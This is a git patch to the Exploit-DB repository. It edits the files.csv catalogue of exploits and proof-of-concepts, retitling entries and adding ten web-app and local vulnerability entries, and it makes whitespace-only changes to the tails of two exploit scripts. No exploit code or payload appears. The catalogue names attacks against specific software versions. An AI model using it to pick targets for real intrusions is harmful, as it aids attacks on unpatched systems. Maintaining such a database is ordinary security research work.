From 93d901f3b25113f27796e757bc503654a21bf256 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 19 Jan 2016 05:03:22 +0000
Subject: [PATCH] DB: 2016-01-19 10 new exploits
---
 files.csv | 50 ++++----
 platforms/linux/remote/107.c | 6 +-
 platforms/linux/remote/43.pl | 6 +-
 platforms/multiple/remote/39258.txt | 9 ++
 platforms/multiple/remote/39259.txt | 9 ++
 platforms/multiple/remote/8037.txt | 34 +++---
 platforms/php/webapps/39255.html | 16 +++
 platforms/php/webapps/39256.txt | 10 ++
 platforms/php/webapps/39257.txt | 9 ++
 platforms/php/webapps/39261.txt | 180 ++++++++++++++++++++++++++++
 platforms/php/webapps/39262.txt | 139 +++++++++++++++++++++
 platforms/php/webapps/39263.txt | 113 +++++++++++++++++
 platforms/php/webapps/39266.txt | 105 ++++++++++++++++
 platforms/windows/local/39260.txt | 66 ++++++++++
 14 files changed, 709 insertions(+), 43 deletions(-)
 create mode 100755 platforms/multiple/remote/39258.txt
 create mode 100755 platforms/multiple/remote/39259.txt
 create mode 100755 platforms/php/webapps/39255.html
 create mode 100755 platforms/php/webapps/39256.txt
 create mode 100755 platforms/php/webapps/39257.txt
 create mode 100755 platforms/php/webapps/39261.txt
 create mode 100755 platforms/php/webapps/39262.txt
 create mode 100755 platforms/php/webapps/39263.txt
 create mode 100755 platforms/php/webapps/39266.txt
 create mode 100755 platforms/windows/local/39260.txt
diff --git a/files.csv b/files.csv
index d835a1e5a..ed1997e9a 100755
--- a/files.csv
+++ b/files.csv
@@ -41,7 +41,7 @@ id,file,description,date,author,platform,type,port
 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit",2003-06-10,N/A,linux,local,0
 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution Exploit",2003-06-10,pokleyzz,linux,remote,80
 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String Exploit",2003-06-11,ThreaT,windows,remote,25
-43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21
+43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 - (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection password disclosure Exploit",2003-06-20,"Rick Patel",php,webapps,0
 45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - Remote Exploit (DSR-ducky.c)",2003-06-23,Rave,windows,remote,80
 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow Exploit",2003-06-27,B-r00t,linux,remote,25
@@ -104,7 +104,7 @@ id,file,description,date,author,platform,type,port
 104,platforms/linux/local/104.c,"hztty 2.0 - Local Root Exploit (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0
 105,platforms/bsd/remote/105.pl,"GNU Cfengine 2.-2.0.3 - Remote Stack Overflow Exploit",2003-09-27,kokanin,bsd,remote,5308
 106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0
-107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
+107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
 109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,N/A,windows,remote,135
 110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 - 1.2.9rc2 - Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21
 111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0
@@ -367,7 +367,7 @@ id,file,description,date,author,platform,type,port
 391,platforms/osx/remote/391.pl,"Mac OS X <= 10.3.3 AppleFileServer Remote Root Overflow Exploit",2004-08-13,"Dino Dai Zovi",osx,remote,548
 392,platforms/linux/remote/392.c,"Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401
 393,platforms/linux/local/393.c,"LibPNG <= 1.2.5 png_jmpbuf() Local Buffer Overflow Exploit",2004-08-13,N/A,linux,local,0
-394,platforms/linux/local/394.c,"ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl",2004-08-13,pi3,linux,local,0
+394,platforms/linux/local/394.c,"ProFTPd - Local pr_ctrls_connect Vulnerability (ftpdctl)",2004-08-13,pi3,linux,local,0
 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM _Away_ Message Local Exploit",2004-08-14,mandragore,windows,local,0
 396,platforms/bsd/local/396.c,"OpenBSD ftp Exploit (teso)",2002-01-01,Teso,bsd,local,0
 397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) Remote Exploit",2002-06-25,Teso,linux,remote,143
@@ -2533,7 +2533,7 @@ id,file,description,date,author,platform,type,port
 2853,platforms/asp/webapps/2853.txt,"SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability",2006-11-26,bolivar,asp,webapps,0
 2854,platforms/windows/dos/2854.py,"AT-TFTP <= 1.9 - (Long Filename) Remote Buffer Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0
 2855,platforms/windows/dos/2855.py,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0
-2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)",2006-11-27,"Evgeny Legerov",linux,remote,21
+2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 - (sreplace) Remote Stack Overflow Exploit (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21
 2857,platforms/multiple/dos/2857.php,"PHP <= 4.4.4/5.1.6 htmlentities() Local Buffer Overflow PoC",2006-11-27,"Nick Kezhaya",multiple,dos,0
 2858,platforms/linux/remote/2858.c,"Evince Document Viewer (DocumentMedia) Buffer Overflow Exploit",2006-11-28,K-sPecial,linux,remote,0
 2859,platforms/php/webapps/2859.php,"Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit",2006-11-28,rgod,php,webapps,0
@@ -2602,7 +2602,7 @@ id,file,description,date,author,platform,type,port
 2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion Exploit",2006-12-12,3l3ctric-Cracker,php,webapps,0
 2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 (LIST/NLST) Denial of Service Exploit",2006-12-13,shinnai,windows,dos,0
 2927,platforms/php/webapps/2927.txt,"PhpMyCMS <= 0.3 (basic.inc.php) Remote File Include Vulnerability",2006-12-13,v1per-haCker,php,webapps,0
-2928,platforms/linux/dos/2928.py,"ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0
+2928,platforms/linux/dos/2928.py,"ProFTPD <= 1.3.0a - (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0
 2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 (DLL-load hijacking) Code Execution Exploit PoC",2006-12-14,"Aviv Raff",windows,dos,0
 2930,platforms/php/webapps/2930.pl,"yaplap <= 0.6.1b (ldap.php) Remote File Include Exploit",2006-12-14,DeltahackingTEAM,php,webapps,0
 2931,platforms/php/webapps/2931.txt,"AR Memberscript (usercp_menu.php) Remote File Include Vulnerability",2006-12-14,ex0,php,webapps,0
@@ -2997,7 +2997,7 @@ id,file,description,date,author,platform,type,port
 3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 (album) Remote SQL Injection Vulnerability",2007-02-17,Bl0od3r,php,webapps,0
 3328,platforms/php/webapps/3328.htm,"S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit",2007-02-18,ajann,php,webapps,0
 3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit",2007-02-18,fuGich,linux,remote,110
-3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit",2007-02-18,Revenge,linux,local,0
+3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (1)",2007-02-18,Revenge,linux,local,0
 3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 (CWD) Remote Buffer Overflow Exploit PoC",2007-02-18,r0ut3r,windows,dos,0
 3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit",2007-02-18,r0ut3r,php,webapps,0
 3333,platforms/linux/local/3333.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (2)",2007-02-19,Revenge,linux,local,0
@@ -3957,7 +3957,7 @@ id,file,description,date,author,platform,type,port
 4309,platforms/php/webapps/4309.txt,"Joomla Component EventList <= 0.8 (did) SQL Injection Vulnerability",2007-08-23,ajann,php,webapps,0
 4310,platforms/php/webapps/4310.txt,"Joomla Component BibTeX <= 1.3 - Remote Blind SQL Injection Exploit",2007-08-23,ajann,php,webapps,0
 4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit",2007-08-23,NetJackal,windows,local,0
-4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit",2007-08-24,netris,linux,remote,21
+4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) - Remote Buffer Overflow Exploit",2007-08-24,netris,linux,remote,21
 4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit",2007-08-25,k1tk4t,php,webapps,0
 4314,platforms/windows/local/4314.php,"PHP Perl Extension Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0
 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit",2007-08-25,"Joxean Koret",linux,remote,389
@@ -7565,7 +7565,7 @@ id,file,description,date,author,platform,type,port
 8034,platforms/php/webapps/8034.txt,"Mynews 0_10 (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0
 8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0
 8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 FD / SQL Injection Command Execution Exploit",2009-02-10,Osirys,php,webapps,0
-8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql Authentication Bypass Vulnerability",2009-02-10,gat3way,multiple,remote,0
+8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql - Authentication Bypass Vulnerability",2009-02-10,gat3way,multiple,remote,0
 8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 (jumpUrl) Remote File Disclosure Exploit",2009-02-10,Lolek,php,webapps,0
 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Remote Shell Upload Vulnerability",2009-02-11,ZoRLu,php,webapps,0
 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities",2009-02-11,x0r,php,webapps,0
@@ -9414,7 +9414,7 @@ id,file,description,date,author,platform,type,port
 10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0
 10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0
 10043,platforms/php/webapps/10043.txt,"redcat media SQL Injection",2009-10-02,s4va,php,webapps,0
-10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)",2009-10-12,"Michael Domberg",unix,local,0
+10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)",2009-10-12,"Michael Domberg",unix,local,0
 10045,platforms/php/webapps/10045.txt,"Community Translate File Inclusion Vulnerability",2009-10-12,NoGe,php,webapps,0
 10046,platforms/php/webapps/10046.txt,"Dazzle Blast Remote File Inclusion",2009-10-12,NoGe,php,webapps,0
 10047,platforms/windows/remote/10047.txt,"Femitter HTTP Server 1.03 - Remote Source Disclosure",2009-10-12,Dr_IDE,windows,remote,80
@@ -10789,7 +10789,7 @@ id,file,description,date,author,platform,type,port
 11790,platforms/php/webapps/11790.txt,"Joomla Component com_vxdate Multiple Vulnerabilities",2010-03-17,MustLive,php,webapps,0
 11791,platforms/windows/local/11791.pl,"myMP3-Player 3.0 - (.m3u) Local Buffer Overflow Exploit (SEH)",2010-03-18,n3w7u,windows,local,0
 11792,platforms/multiple/dos/11792.pl,"mplayer <= 4.4.1 NULL pointer dereference Exploit PoC",2010-03-18,"Pietro Oliva",multiple,dos,0
-11793,platforms/jsp/webapps/11793.txt,"Manage Engine Service Desk Plus 7.6 - woID SQL Injection",2010-03-18,"Nahuel Grisolia",jsp,webapps,0
+11793,platforms/jsp/webapps/11793.txt,"ManageEngine ServiceDesk Plus 7.6 - woID SQL Injection",2010-03-18,"Nahuel Grisolia",jsp,webapps,0
 11794,platforms/windows/local/11794.c,"MediaCoder - (.lst file) Local Buffer Overflow Exploit",2010-03-18,"fl0 fl0w",windows,local,0
 11795,platforms/php/webapps/11795.txt,"DewNewPHPLinks 2.1.0.1 - LFI",2010-03-18,ITSecTeam,php,webapps,0
 11797,platforms/windows/local/11797.py,"ZippHo 3.0.6 - (.zip) Stack Buffer Overflow PoC Exploit (0day)",2010-03-18,mr_me,windows,local,0
@@ -13439,7 +13439,7 @@ id,file,description,date,author,platform,type,port
 15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0
 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0
 15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
-15449,platforms/linux/remote/15449.pl,"ProFTPD IAC - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
+15449,platforms/linux/remote/15449.pl,"ProFTPD IAC 1.3.x - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
 15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
 15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
@@ -13960,7 +13960,7 @@ id,file,description,date,author,platform,type,port
 16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 Wordpress Plugin - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0
 16127,platforms/php/webapps/16127.txt,"T-Content Managment System Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0
 16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Stored XSS via useragent http header injection",2011-02-07,"Saif El-Sherei",php,webapps,0
-16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp Integer Overflow DoS PoC",2011-02-07,kingcope,linux,dos,0
+16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp - Integer Overflow DoS PoC",2011-02-07,kingcope,linux,dos,0
 16130,platforms/php/webapps/16130.txt,"MyMarket 1.71 (index.php) SQL Injection Vulnerability",2011-02-07,ahmadso,php,webapps,0
 16131,platforms/php/webapps/16131.txt,"SWFUpload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0
 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0
@@ -14653,7 +14653,7 @@ id,file,description,date,author,platform,type,port
 16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 - _secure_ Overflow (Linux)",2010-09-20,metasploit,linux,remote,0
 16849,platforms/linux/remote/16849.rb,"MySQL yaSSL SSL Hello Message Buffer Overflow",2010-05-09,metasploit,linux,remote,0
 16850,platforms/linux/remote/16850.rb,"MySQL yaSSL CertDecoder::GetName Buffer Overflow",2010-04-30,metasploit,linux,remote,0
-16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0
+16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 - 1.3.3b - Telnet IAC Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0
 16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0
 16853,platforms/linux/remote/16853.rb,"Berlios GPSD Format String Vulnerability",2010-04-30,metasploit,linux,remote,0
 16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point apply.cgi Buffer Overflow",2010-09-24,metasploit,hardware,remote,0
@@ -14720,7 +14720,7 @@ id,file,description,date,author,platform,type,port
 16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent net.tcp.listen Command Injection",2010-07-03,metasploit,freebsd,remote,0
 16919,platforms/linux/remote/16919.rb,"DistCC Daemon Command Execution",2010-07-03,metasploit,linux,remote,0
 16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd Remote Command Execution",2010-04-30,metasploit,linux,remote,0
-16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0
+16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c - Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0
 16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 - Backdoor Command Execution",2010-12-05,metasploit,linux,remote,0
 16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web Remote Command Execution",2010-10-09,metasploit,hardware,webapps,0
 16924,platforms/linux/remote/16924.rb,"ClamAV Milter Blackhole-Mode Remote Code Execution",2010-10-09,metasploit,linux,remote,0
@@ -15155,7 +15155,7 @@ id,file,description,date,author,platform,type,port
 17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server DATAC Login Buffer Overflow",2011-06-22,metasploit,windows,remote,0
 17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0
 17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection Vulnerability",2011-06-23,"Brendan Coles",php,webapps,0
-17437,platforms/jsp/webapps/17437.txt,"manageengine service desk plus 8.0 - Directory Traversal Vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0
+17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal Vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0
 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0
 17439,platforms/sh4/shellcode/17439.c,"SuperH (sh4) Add root user with password",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit",2011-06-23,"Iván García Ferreira",windows,local,0
@@ -16869,7 +16869,7 @@ id,file,description,date,author,platform,type,port
 19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 X Library Buffer Overflow Vulnerability (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0
 19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f_AIX <= 4.3.2_CDE <= 2.1_IRIX <= 6.5.14_Solaris <= 7.0_SunOS <= 4.1.4 BoF",1999-09-13,"Job de Haas of ITSX",linux,local,0
 19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation Vulnerability",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0
-19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0
+19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 - snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0
 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 GECOS Buffer Overflow Vulnerability",1999-09-21,"babcia padlina ltd",freebsd,local,0
 19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service Vulnerability",1999-09-22,"Charles M. Hannum",freebsd,dos,0
 19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3_ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0
@@ -17685,7 +17685,7 @@ id,file,description,date,author,platform,type,port
 20353,platforms/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot eval() Remote Code Execution",2012-08-08,metasploit,php,remote,0
 20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",2012-08-08,metasploit,windows,remote,0
-20356,platforms/windows/webapps/20356.py,"ManageEngine Service Desk Plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
+20356,platforms/windows/webapps/20356.py,"ManageEngine ServiceDesk Plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20358,platforms/php/webapps/20358.py,"wordpress mini mail dashboard widget 1.42 - Stored XSS",2012-08-08,loneferret,php,webapps,0
 20359,platforms/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
@@ -17858,7 +17858,7 @@ id,file,description,date,author,platform,type,port
 20533,platforms/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Remote Arbitrary Command Execution Vulnerability",2001-01-07,scott,cgi,remote,0
 20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition DoS Vulnerability",2001-01-10,"Murat - 2",multiple,dos,0
 20535,platforms/linux/dos/20535.txt,"ReiserFS 3.5.28 Kernel - DoS (Possible Code Execution Vulnerability)",2001-01-09,"Marc Lehmann",linux,dos,0
-20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0
+20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 - SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0
 20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 Backdoor Password Vulnerability",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0
 20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 Incorrect File Permissions Vulnerability",2001-01-11,"Tamer Sahin",php,webapps,0
 20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 - Remote File Upload Vulnerability",2012-08-15,ICheer_No0M,php,webapps,0
@@ -19339,7 +19339,7 @@ id,file,description,date,author,platform,type,port
 22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta ViewTopic.PHP Cross-Site Scripting Vulnerability",2002-11-08,euronymous,php,webapps,0
 22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability",2002-11-09,"Dorin Balanica",php,webapps,0
 22078,platforms/windows/remote/22078.txt,"mollensoft software enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0
-22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x STAT Command Denial of Service Vulnerability",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
+22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x - STAT Command Denial of Service Vulnerability",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
 22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0
 22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0
 22082,platforms/windows/remote/22082.pl,"Trend Micro PC-cillin 2000/2002/2003 Mail Scanner Buffer Overflow Vulnerability",2002-12-10,"Joel Soderberg",windows,remote,0
@@ -20397,7 +20397,7 @@ id,file,description,date,author,platform,type,port
 23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 Headers Prescan Denial of Service Vulnerability",1998-12-12,marchew,irix,dos,0
 23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Elevation Vulnerability",2003-09-22,"Sebastian Krahmer",linux,local,0
 23169,platforms/windows/dos/23169.pl,"wzdftpd 0.1 rc5 Login Remote Denial of Service Vulnerability",2003-09-23,"Moran Zavdi",windows,dos,0
-23170,platforms/linux/dos/23170.c,"ProFTPD 1.2.7/1.2.8 ASCII File Transfer Buffer Overrun Vulnerability",2003-09-23,netris,linux,dos,0
+23170,platforms/linux/dos/23170.c,"ProFTPD 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun Vulnerability",2003-09-23,netris,linux,dos,0
 23171,platforms/linux/remote/23171.c,"MPG123 0.59 - Remote File Play Heap Corruption Vulnerability",2003-09-23,V9,linux,remote,0
 23172,platforms/linux/dos/23172.txt,"Gauntlet Firewall for Unix 6.0 SQL-GW Connection Denial of Service Vulnerability",2003-09-24,"Oliver Heinz and Thomas Neuderth",linux,dos,0
 23173,platforms/multiple/remote/23173.txt,"TCLhttpd 3.4.2 - Directory Listing Disclosure Vulnerability",2003-09-24,"Phuong Nguyen",multiple,remote,0
@@ -35500,3 +35500,13 @@ id,file,description,date,author,platform,type,port
 39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
 39253,platforms/php/webapps/39253.txt,"WordPress ENL Newsletter Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
 39254,platforms/php/webapps/39254.html,"WordPress CopySafe PDF Protection Plugin Arbitrary File Upload Vulnerability",2014-07-14,"Jagriti Sahu",php,webapps,0
+39255,platforms/php/webapps/39255.html,"WEBMIS CMS Arbitrary File Upload Vulnerability",2014-07-14,"Jagriti Sahu",php,webapps,0
+39256,platforms/php/webapps/39256.txt,"Tera Charts (tera-charts) Plugin for WordPress charts/treemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0
+39257,platforms/php/webapps/39257.txt,"Tera Charts (tera-charts) Plugin for WordPress charts/zoomabletreemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0
+39258,platforms/multiple/remote/39258.txt,"Alfresco /proxy endpoint Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
+39259,platforms/multiple/remote/39259.txt,"Alfresco /cmisbrowser url Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
+39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0
+39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - CSRF Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80
+39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent XSS Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80
+39263,platforms/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - RFI / CSRF Vulnerability",2016-01-18,hyp3rlinx,php,webapps,80
+39266,platforms/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443
diff --git a/platforms/linux/remote/107.c b/platforms/linux/remote/107.c
index c9859ebb5..f30743c44 100755
--- a/platforms/linux/remote/107.c
+++ b/platforms/linux/remote/107.c
@@ -779,6 +779,6 @@ int checklf(void *sd,int len)
 return 0; }
-
-
-// milw0rm.com [2003-10-04]
+
+
+// milw0rm.com [2003-10-04]
diff --git a/platforms/linux/remote/43.pl b/platforms/linux/remote/43.pl
index 81973b6f5..b7d822e8a 100755
--- a/platforms/linux/remote/43.pl
+++ b/platforms/linux/remote/43.pl
@@ -42,6 +42,6 @@ if($line =~ /230/){ #logged in
 }else{
 print "[------- Sql Inject Unable \n";
 }
-close $remote;
-
-# milw0rm.com [2003-06-19]
+close $remote;
+
+# milw0rm.com [2003-06-19]
